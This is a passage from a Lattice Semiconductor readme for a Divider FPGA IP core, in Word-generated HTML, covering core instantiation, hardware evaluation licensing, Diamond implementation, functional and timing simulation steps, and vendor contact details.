IP Core</span><span lang=EN-US style='color:navy'><o:p></o:p></span></h1>

<div style='mso-element:para-border-div;border:none;border-bottom:solid windowtext 1.0pt;
mso-border-bottom-alt:solid windowtext .75pt;padding:0cm 0cm 0cm 0cm'>

<p class=MsoNormal style='margin-bottom:12.0pt;border:none;mso-border-bottom-alt:
solid windowtext .75pt;padding:0cm;mso-padding-alt:0cm 0cm 0cm 0cm'><a
name=implementing></a><b><span lang=EN-US style='font-size:18.0pt;font-family:
"Arial","sans-serif"'>Implementing the IP Module Using Lattice Diamond</span></b></p>

</div>

<p class=MsoNormal style='margin-bottom:12.0pt'><span lang=EN-US><br>
</span><b><span lang=EN-US style='font-family:"Arial","sans-serif"'>Instantiating
the Core</span></b></p>

<table class=MsoNormalTable border=0 cellpadding=0 width="80%"
 style='width:80.0%;mso-cellspacing:1.5pt;mso-yfti-tbllook:1184;mso-padding-alt:
 0cm 0cm 0cm 0cm'>
 <tr style='mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes'>
  <td style='padding:.75pt .75pt .75pt .75pt'>
  <p><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>The
  generated Divider IP core package includes black-box (&lt;username&gt;_<span
  class=SpellE>bb.v</span>) and instance (&lt;username&gt;_<span class=SpellE>inst.v</span>)
  templates that can be used to instantiate the core in a top-level design. <o:p></o:p></span></p>
  <p><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>An
  example RTL top-level reference source file that can be used as an
  instantiation template for the IP core is provided in <i>\&lt;<span
  class=SpellE>project_dir</span>&gt;\<span class=SpellE>divider_eval</span>\&lt;username&gt;\<span
  class=SpellE>src</span>\<span class=SpellE>rtl</span>\top\&lt;family&gt;</i>.
  Users may also use this top-level reference as the starting template for the
  top-level for their complete design. <o:p></o:p></span></p>
  <p><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>For
  VHDL entry, only a top-level file is generated which contains the core
  instantiation within.<o:p></o:p></span></p>
  <p><strong><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>For
  Linux environment<span class=GramE>:</span></span></strong><span lang=EN-US
  style='font-size:10.0pt;font-family:"Verdana","sans-serif"'><br>
  Once the IP core is installed, the user needs to change the permissions of
  the files in the install directory. To do this, go to <strong><span
  style='font-family:"Verdana","sans-serif"'>&lt;<span class=SpellE>install_directory</span>&gt;/divider_v1.0/<span
  class=SpellE>gui</span> </span></strong>and type <span class=SpellE><strong><span
  style='font-family:"Verdana","sans-serif"'>chmod</span></strong></span><strong><span
  style='font-family:"Verdana","sans-serif"'> 777 <span class=SpellE>coeff_gen_l</span></span></strong>.
  Otherwise, when the user tries to generate the IP core, IPexpress will error
  out. </span></p>
  </td>
 </tr>
</table>

<p class=MsoNormal style='margin-bottom:12.0pt'><span lang=EN-US><br>
</span><b><span lang=EN-US style='font-family:"Arial","sans-serif"'>Hardware
Evaluation</span></b></p>

<table class=MsoNormalTable border=0 cellpadding=0 width="80%"
 style='width:80.0%;mso-cellspacing:1.5pt;mso-yfti-tbllook:1184;mso-padding-alt:
 0cm 0cm 0cm 0cm'>
 <tr style='mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes'>
  <td style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoBodyText><span lang=EN-US>Lattice's IP hardware evaluation
  capability makes it possible to create IP cores that operate in hardware for
  a limited period of time (approximately four hours) without requiring the
  purchase on an IP license. The hardware evaluation capability is enabled by
  default. It can be disabled by Project-&gt;Active Strategy-&gt;Translate
  Design Settings. The setting is called &quot;Hardware Evaluation&quot; and
  the options are &quot;Enable&quot; or &quot;Disable&quot;.<br>
  <span style='mso-spacerun:yes'>�</span><br>
  When the Hardware Evaluation feature is enabled in the design, it will
  generate a programming file that may be downloaded into the device. After
  initialization, the IP core will be operational for approximately four hours.
  After four hours, the device will stop working and it will be necessary to
  reprogram the device to re-enable operation. This hardware evaluation
  capability is only enabled if the core has not been licensed. During
  implementation, a license check is performed. If the hardware evaluation
  feature is disabled, a pop-up window will be displayed indicating a license
  failure. <span class=SpellE>Click&quot;OK</span>&quot; in the window and the <span
  class=SpellE>bitstream</span> will not be generated. If a license is
  detected, no pop-up window is displayed and core generation is completed with
  no restrictions. </span></p>
  <p class=MsoNormal><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'><o:p>&nbsp;</o:p></span></p>
  </td>
 </tr>
</table>

<p class=MsoNormal><span lang=EN-US><br>
</span><b><span lang=EN-US style='font-family:"Arial","sans-serif"'>Implementing
the Core in a Top-Level Design</span></b></p>

<table class=MsoNormalTable border=0 cellpadding=0 width="80%"
 style='width:80.0%;mso-cellspacing:1.5pt;mso-yfti-tbllook:1184;mso-padding-alt:
 0cm 0cm 0cm 0cm'>
 <tr style='mso-yfti-irow:0;mso-yfti-firstrow:yes'>
  <td style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span lang=EN-US><br>
  </span><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>As
  described previously, the top-level file &lt;username&gt;_<span class=SpellE>top.v</span>
  provided in <i>\&lt;<span class=SpellE>project_dir</span>&gt;\<span
  class=SpellE>divider_eval</span>\&lt;username&gt;\<span class=SpellE>src</span>\<span
  class=SpellE>rtl</span>\top\&lt;family&gt;</i> supports the ability to
  implement just the <i>Divider</i> Block. <o:p></o:p></span></p>
  <p><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Push-button
  top-level implementation of this top-level is supported via the Diamond
  project file &lt;username&gt;_<span class=SpellE>top.ldf</span> located in <i>\&lt;<span
  class=SpellE>project_dir</span>&gt;\<span class=SpellE>divider_eval</span>\&lt;username&gt;\<span
  class=SpellE>impl</span>\<span class=SpellE>synplify</span></i>. <o:p></o:p></span></p>
  <p><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>This
  design is intended only to provide an accurate indication of the device
  utilization associated with the core itself and should not be used as an
  actual implementation example. <o:p></o:p></span></p>
  <p><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>To
  use the project file:</span><span lang=EN-US style='font-size:10.0pt;
  mso-bidi-font-size:12.0pt;font-family:"Verdana","sans-serif";mso-fareast-font-family:
  SimSun;mso-bidi-font-family:Arial'><o:p></o:p></span></p>
  </td>
 </tr>
 <tr style='mso-yfti-irow:1;mso-yfti-lastrow:yes'>
  <td style='padding:.75pt .75pt .75pt .75pt'>
  <ul type=disc>
   <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:
       auto;mso-list:l1 level1 lfo1;tab-stops:list 36.0pt'><span lang=EN-US
       style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Select <i
       style='mso-bidi-font-style:normal'>File-&gt;Open-&gt;Project</i> in
       Lattice Diamond.<o:p></o:p></span></li>
   <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:
       auto;mso-list:l1 level1 lfo1;tab-stops:list 36.0pt'><span lang=EN-US
       style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Browse to <i>\&lt;<span
       class=SpellE>project_dir</span>&gt;\<span class=SpellE>divider_eval</span>\&lt;username&gt;\<span
       class=SpellE>impl</span>\<span class=SpellE>synplify</span></i> in the
       Open Project dialog box.<o:p></o:p></span></li>
   <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:
       auto;mso-list:l1 level1 lfo1;tab-stops:list 36.0pt'><span lang=EN-US
       style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Select and
       open &lt;username&gt;_<span class=SpellE>top.ldf</span>. At this point,
       all of the files needed to support top-level synthesis and
       implementation will be imported to the project.<o:p></o:p></span></li>
   <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:
       auto;mso-list:l1 level1 lfo1;tab-stops:list 36.0pt'><span lang=EN-US
       style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>An <span
       class=SpellE>lpf</span> files is available in the <i>\<span
       class=SpellE>impl</span>\<span class=SpellE>synplify</span> </i>directory
       &lt;<i>username</i>&gt;_<span class=SpellE>top.lpf</span>.<o:p></o:p></span></li>
   <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:
       auto;mso-list:l1 level1 lfo1;tab-stops:list 36.0pt'><span lang=EN-US
       style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Implement the
       complete design via the standard Lattice Diamond GUI flow.<o:p></o:p></span></li>
  </ul>
  <ul style='margin-top:0cm' type=disc>
   <li class=MsoNormal style='mso-list:l2 level1 lfo2;tab-stops:list 36.0pt ..5in'><span
       lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>All
       other options remain at their default values. <o:p></o:p></span></li>
  </ul>
  </td>
 </tr>
</table>

<p style='margin-bottom:12.0pt'><span lang=EN-US><br>
</span><b><span lang=EN-US style='font-family:"Arial","sans-serif"'>Running
Functional Simulation</span></b></p>

<p class=MsoNormal><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>The
functional simulation includes a configuration-specific behavioral model of the
<i>Divider</i>, which is instantiated in an FPGA top level along with some
other logic (like PLLs and registers with Read/Write Interface). This FPGA top
is instantiated in an evaluation <span class=SpellE>testbench</span> that
provides appropriate stimulus for the <i>Divider</i> IP core. The <span
class=SpellE>testbench</span> files can be found in <i>\&lt;<span class=SpellE>project_dir</span>&gt;\<span
class=SpellE>divider_eval</span>\<span class=SpellE>testbench</span></i>. <o:p></o:p></span></p>

<p class=MsoNormal><span lang=EN-US>&nbsp;</span></p>

<p class=MsoNormal><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>The
generated IP core package includes the configuration-specific behavior model (<i>&lt;username&gt;_<span
class=SpellE>beh.v<span class=GramE><span style='font-style:normal'>,provided</span></span></span></i>
in <i>\&lt;<span class=SpellE>project_dir</span>&gt;\<span class=SpellE>divider_eval</span>\&lt;username&gt;\<span
class=SpellE>src</span>\<span class=SpellE>beh_rtl</span>\&lt;family&gt;</i>)
for functional simulation. <o:p></o:p></span></p>

<p class=MsoNormal><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Users
may run the <span class=SpellE>eval</span> simulation on <span class=SpellE><b>ModelSim</b></span><b>
SE*</b>(Windows or Linux) by doing the following:<o:p></o:p></span></p>

<p class=MsoNormal><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'><o:p>&nbsp;</o:p></span></p>

<ul style='margin-top:0cm' type=disc>
 <li class=MsoNormal style='mso-list:l3 level1 lfo3;tab-stops:list 36.0pt'><span
     lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Open
     <span class=SpellE>ModelSim</span>.</span><span class=msonormal0><span
     lang=EN-US><o:p></o:p></span></span></li>
 <li class=MsoNormal style='mso-list:l3 level1 lfo3;tab-stops:list 36.0pt'><span
     class=msonormal0><span lang=EN-US style='font-size:10.0pt;font-family:
     "Verdana","sans-serif"'>Under the </span></span><em><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>File</span></em><span
     class=msonormal0><span lang=EN-US style='font-size:10.0pt;font-family:
     "Verdana","sans-serif"'> tab, select </span></span><em><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>change
     directory</span></em></li>
 <li class=MsoNormal style='mso-list:l3 level1 lfo3;tab-stops:list 36.0pt'><span
     class=msonormal0><span lang=EN-US style='font-size:10.0pt;font-family:
     "Verdana","sans-serif"'>Set the directory to </span></span><span
     lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>\&lt;<span
     class=SpellE>project_dir</span>&gt;\<span class=SpellE><i>divider_eval</i></span><i>\&lt;username&gt;\<span
     class=SpellE>sim</span>\<span class=SpellE>modelsim</span>\<span
     class=SpellE>rtl</span></i></span></li>
 <li class=MsoNormal style='mso-list:l3 level1 lfo3;tab-stops:list 36.0pt'><span
     lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Select
     OK.</span></li>
 <li class=MsoNormal style='mso-list:l3 level1 lfo3;tab-stops:list 36.0pt'><span
     lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Under
     the Tools tab, select TCL, then select Execute <span class=GramE>Macro ..</span><i>\scripts\&lt;username&gt;_rtl_se.do</i>.<o:p></o:p></span></li>
</ul>

<p class=MsoNormal><span lang=EN-US>&nbsp;</span></p>

<p class=MsoNormal><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Users
may run the <span class=SpellE>eval</span> simulation on <b>Active-<span
class=GramE>HDL<span style='font-weight:normal'>(</span></span></b>Windows
only) by doing the following:<o:p></o:p></span></p>

<ul type=disc>
 <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo4;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Open <span
     class=SpellE>Active_HDL</span>.<o:p></o:p></span></li>
 <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo4;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Under the <i>Tools</i>
     tab, select <i>Execute Macro...</i><o:p></o:p></span></li>
 <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo4;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Select file <i>\&lt;project_dir&gt;\divider_eval\&lt;username&gt;\sim\aldec\scripts\&lt;username&gt;_rtl.do</i>
     <o:p></o:p></span></li>
 <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo4;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Select OK.<o:p></o:p></span></li>
</ul>

<p style='margin-bottom:12.0pt'><b><span lang=EN-US style='font-family:"Arial","sans-serif"'>Running
Timing Simulation</span></b><b><span lang=EN-US style='font-size:10.0pt;
font-family:"Verdana","sans-serif"'><o:p></o:p></span></b></p>

<p class=MsoNormal style='margin-bottom:12.0pt'><span lang=EN-US
style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>In order to run the
Post route timing simulation, an IP license is required. You need to generate
the timing simulation files by double-clicking on &quot;generate Timing
Simulation Files&quot; in the process for current source window of the Project
Navigator.<o:p></o:p></span></p>

<p class=MsoNormal><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Users
may run the <span class=SpellE>eval</span> simulation on <span class=SpellE><b>ModelSim</b></span><b>
SE*</b>(Windows or Linux) by doing the following:<o:p></o:p></span></p>

<p class=MsoNormal><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'><o:p>&nbsp;</o:p></span></p>

<ul style='margin-top:0cm' type=disc>
 <li class=MsoNormal style='mso-list:l3 level1 lfo3;tab-stops:list 36.0pt'
     style3><span class=msonormal0><span lang=EN-US style='font-size:10.0pt;
     font-family:"Verdana","sans-serif"'>Under the </span></span><em><span
     lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>File</span></em><span
     class=msonormal0><span lang=EN-US style='font-size:10.0pt;font-family:
     "Verdana","sans-serif"'> tab, select </span></span><em><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>change
     directory</span></em></li>
 <li class=MsoNormal style='mso-list:l3 level1 lfo3;tab-stops:list 36.0pt'><span
     class=msonormal0><span lang=EN-US style='font-size:10.0pt;font-family:
     "Verdana","sans-serif"'>Set the directory to </span></span><span
     lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>\&lt;<span
     class=SpellE>project_dir</span>&gt;\<span class=SpellE><i>divider_eval</i></span><i>\&lt;username&gt;\<span
     class=SpellE>sim</span>\<span class=SpellE>modelsim</span>\timing</i></span></li>
 <li class=MsoNormal style='mso-list:l3 level1 lfo3;tab-stops:list 36.0pt'><span
     lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Select
     OK.</span></li>
 <li class=MsoNormal style='mso-list:l3 level1 lfo3;tab-stops:list 36.0pt'><span
     lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Under
     the Tools tab, select TCL, then select Execute <span class=GramE>Macro ..</span><i>\scripts\&lt;username&gt;_sdf_synp_se.do</i>.<o:p></o:p></span></li>
</ul>

<p class=MsoNormal><span lang=EN-US>&nbsp;</span></p>

<p class=MsoNormal><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Users
may run the <span class=SpellE>eval</span> simulation on <b>Active-<span
class=GramE>HDL<span style='font-weight:normal'>(</span></span></b>Windows
only) by doing the following:<o:p></o:p></span></p>

<ul type=disc>
 <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo4;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Open
     Active-HDL.<o:p></o:p></span></li>
 <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo4;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Under the <i>Tools</i>
     tab, select <i>Execute Macro...</i><o:p></o:p></span></li>
 <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo4;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Select file <i>\&lt;project_dir&gt;\divider_eval\&lt;username&gt;\sim\aldec\scripts\&lt;username&gt;_sdf_synp.do</i>
     <o:p></o:p></span></li>
 <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo4;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Select OK.</span><span
     lang=EN-US> </span><span lang=EN-US style='font-size:10.0pt;font-family:
     "Verdana","sans-serif"'><o:p></o:p></span></li>
</ul>

<p class=MsoNormal><span lang=EN-US style='font-size:8.0pt;font-family:"Verdana","sans-serif"'>*
For running VHDL RTL/Timing simulation on <span class=SpellE>ModelSim</span>
SE, pre-compiled Library should be prepared first.</span></p>

<p class=MsoNormal><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'><o:p>&nbsp;</o:p></span></p>

<p style='margin-bottom:12.0pt'><b><span lang=EN-US style='font-family:"Arial","sans-serif"'>Timing
Report file</span></b><span lang=EN-US style='font-size:10.0pt;font-family:
"Verdana","sans-serif"'><o:p></o:p></span></p>

<ul type=disc>
 <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo4;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Open Lattice
     Diamond.<o:p></o:p></span></li>
 <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo4;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Select <i
     style='mso-bidi-font-style:normal'>File-&gt;Open-&gt;Project</i>.<o:p></o:p></span></li>
 <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo4;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Select file <i><span
     style='mso-bidi-font-weight:bold'>\&lt;project_dir&gt;\divider_eval\&lt;username&gt;\impl\synplify\&lt;username&gt;_top.ldf</span></i>.<o:p></o:p></span></li>
 <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo4;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif";mso-fareast-font-family:
     SimSun'>Double</span><span lang=EN-US style='font-size:10.0pt;font-family:
     "Verdana","sans-serif"'> Click on <span style='mso-bidi-font-weight:bold'>Place
     &amp; Route TRACE</span>.</span><span lang=EN-US> </span><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'><o:p></o:p></span></li>
 <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo4;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>New Timing
     Report is generated.</span><span lang=EN-US> </span><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'><o:p></o:p></span></li>
</ul>

<p class=MsoNormal><span lang=EN-US><br>
</span><b><span lang=EN-US style='font-family:"Arial","sans-serif"'>Reference Information</span></b><span
lang=EN-US><br>
</span><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'><br>
<span class=GramE>The</span> following documents provide more information on
implementing this core:<o:p></o:p></span></p>

<ul type=disc>
 <li class=MsoNormal style='color:#013C9A;mso-margin-top-alt:auto;mso-margin-bottom-alt:
     auto;mso-list:l4 level1 lfo5;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'><a
     href="http://www.latticesemi.com/lit/docs/ip/ipug58.pdf" target="_blank"><span
     style='color:#013C9A'>User's Guide</span></a><o:p></o:p></span></li>
 <li class=MsoNormal style='color:#013C9A;mso-margin-top-alt:auto;mso-margin-bottom-alt:
     auto;mso-list:l4 level1 lfo5;tab-stops:list 36.0pt'><span lang=EN-US
     style='font-size:10.0pt;font-family:"Verdana","sans-serif"'><a
     href="http://www.latticesemi.com/documents/doc18503x86.pdf" target="_blank"><span
     style='color:#013C9A'>IPexpress Quick Start Guide</span></a> <o:p></o:p></span></li>
</ul>

<div style='mso-element:para-border-div;border:none;border-bottom:solid windowtext 1.0pt;
mso-border-bottom-alt:solid windowtext .75pt;padding:0cm 0cm 0cm 0cm'>

<p class=MsoNormal style='margin-bottom:12.0pt;border:none;mso-border-bottom-alt:
solid windowtext .75pt;padding:0cm;mso-padding-alt:0cm 0cm 0cm 0cm'><span
lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif";
color:#013C9A'><script language="javascript1.2"  type="text/javascript">
<!--
if (window.writeIntopicBar)
	writeIntopicBar(0);
//-->
</script></span><span lang=EN-US>&nbsp;</span></p>

<p class=MsoNormal style='margin-bottom:12.0pt;border:none;mso-border-bottom-alt:
solid windowtext .75pt;padding:0cm;mso-padding-alt:0cm 0cm 0cm 0cm'><b><span
lang=EN-US style='font-size:18.0pt;font-family:"Arial","sans-serif"'>General
Information</span></b></p>

</div>

<p class=MsoNormal style='margin-bottom:12.0pt'><span lang=EN-US><br>
</span><b><span lang=EN-US style='font-family:"Arial","sans-serif"'>Copyright
Notice</span></b></p>

<table class=MsoNormalTable border=0 cellpadding=0 width="80%"
 style='width:80.0%;mso-cellspacing:1.5pt;mso-yfti-tbllook:1184;mso-padding-alt:
 0cm 0cm 0cm 0cm'>
 <tr style='mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes'>
  <td style='padding:.75pt .75pt .75pt .75pt'>
  <p><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Copyright
  2000-2012 Lattice Semiconductor Corporation. ALL RIGHTS RESERVED. This
  confidential and proprietary software may be used only as authorized by a
  licensing agreement from Lattice Semiconductor Corporation. The entire notice
  above must be reproduced on all authorized copies and copies may only be made
  to the extent permitted by a licensing agreement from Lattice Semiconductor
  Corporation.<o:p></o:p></span></p>
  </td>
 </tr>
</table>

<div style='mso-element:para-border-div;border:none;border-bottom:solid windowtext 1.0pt;
mso-border-bottom-alt:solid windowtext .75pt;padding:0cm 0cm 0cm 0cm'>

<p class=MsoNormal style='margin-bottom:12.0pt;border:none;mso-border-bottom-alt:
solid windowtext .75pt;padding:0cm;mso-padding-alt:0cm 0cm 0cm 0cm'><span
lang=EN-US><br>
</span><b><span lang=EN-US style='font-size:18.0pt;font-family:"Arial","sans-serif"'>Contacting
Lattice</span></b></p>

</div>

<p class=MsoNormal><span lang=EN-US><o:p>&nbsp;</o:p></span></p>

<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width=636
 style='width:477.05pt;mso-cellspacing:0cm;margin-left:9.0pt;mso-yfti-tbllook:
 1184;mso-padding-alt:0cm 0cm 0cm 0cm;border:..75pt;border-spacing: 0px;
 border-spacing: 0px' x-use-null-cells>
 <col class=whs6><col class=whs7>
 <tr style='mso-yfti-irow:0;mso-yfti-firstrow:yes;x-cell-content-align: top'>
  <td width=112 valign=top style='width:84.35pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><!--(Table)=========================================================--><span
  lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Mail:<o:p></o:p></span></p>
  </td>
  <td width=524 valign=top style='width:392.7pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Lattice
  Semiconductor Corporation<br>
<st1:address w:st="on"><st1:Street w:st="on">5555 NE Moore Court</st1:Street><br>
<st1:City w:st="on">Hillsboro</st1:City>, <st1:State w:st="on">OR</st1:State>
   &nbsp;<st1:PostalCode w:st="on">97124</st1:PostalCode><br>
<st1:country-region w:st="on">U.S.A.<u1:p></u1:p></st1:country-region></st1:address><o:p></o:p></span></p>
  </td>
 </tr>
 <tr style='mso-yfti-irow:1;x-cell-content-align: top'>
  <td width=112 valign=top style='width:84.35pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Telephone:<o:p></o:p></span></p>
  </td>
  <td width=524 valign=top style='width:392.7pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>1-800-LATTICE
  (<st1:country-region w:st="on">USA</st1:country-region> and <st1:place w:st="on"><st1:country-region
   w:st="on">Canada</st1:country-region></st1:place>)<u1:p></u1:p><o:p></o:p></span></p>
  </td>
 </tr>
 <tr style='mso-yfti-irow:2;x-cell-content-align: top'>
  <td width=112 valign=top style='width:84.35pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US>&nbsp;</span></p>
  </td>
  <td width=524 valign=top style='width:392.7pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>1-503-268-8001
  (other locations)<u1:p></u1:p><o:p></o:p></span></p>
  </td>
 </tr>
 <tr style='mso-yfti-irow:3;x-cell-content-align: top'>
  <td width=112 valign=top style='width:84.35pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Website:<o:p></o:p></span></p>
  </td>
  <td width=524 valign=top style='width:392.7pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif";
  color:#013C9A'><a href="http://www.latticesemi.com" target="_blank"><span
  style='color:#013C9A'>http://www.latticesemi.com</span></a><u1:p></u1:p>(<st1:country-region
  w:st="on">US</st1:country-region>)<br>
  <a href="http://www.latticesemi.com" target="_blank"><span style='color:#013C9A'>http://www.latticesemi.com.cn(China)</span></a><br>
  <a href="http://www.latticesemi.com" target="_blank"><span style='color:#013C9A'>http://www.latticesemi.co.kr(Korea)</span></a><br>
  <a href="http://www.latticesemi.com" target="_blank"><span style='color:#013C9A'>http://www.latticesemi.co.jp(Japan)</span></a>
  <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style='mso-yfti-irow:4;mso-yfti-lastrow:yes;x-cell-content-align: top'>
  <td width=112 valign=top style='width:84.35pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>E-mail:<o:p></o:p></span></p>
  </td>
  <td width=524 valign=top style='width:392.7pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif";
  color:#013C9A'><a href="mailto:techsupport@latticesemi.com"><span
  style='color:#013C9A'>techsupport@latticesemi.com</span></a><u1:p></u1:p><br>
  <a href="mailto:techsupport-asia@latticesemi.com"><span style='color:#013C9A'>techsupport-asia@latticesemi.com
  (Asia)</span></a><o:p></o:p></span></p>
  </td>
 </tr>
</table>

<p style='margin-top:0cm;margin-right:0cm;margin-bottom:12.0pt;margin-left:
0cm'><span lang=EN-US><o:p>&nbsp;</o:p></span></p>

<div style='mso-element:para-border-div;border:none;border-bottom:solid windowtext 1.0pt;
mso-border-bottom-alt:solid windowtext .75pt;padding:0cm 0cm 0cm 0cm'>

<p class=MsoNormal style='margin-bottom:12.0pt;border:none;mso-border-bottom-alt:
solid windowtext .75pt;padding:0cm;mso-padding-alt:0cm 0cm 0cm 0cm'><b><span
lang=EN-US style='font-size:18.0pt;font-family:"Arial","sans-serif"'>IP Module
Information</span></b></p>

</div>

<p class=MsoNormal style='margin-bottom:12.0pt'><span lang=EN-US><br>
</span><b><span lang=EN-US style='font-family:"Arial","sans-serif"'>About this
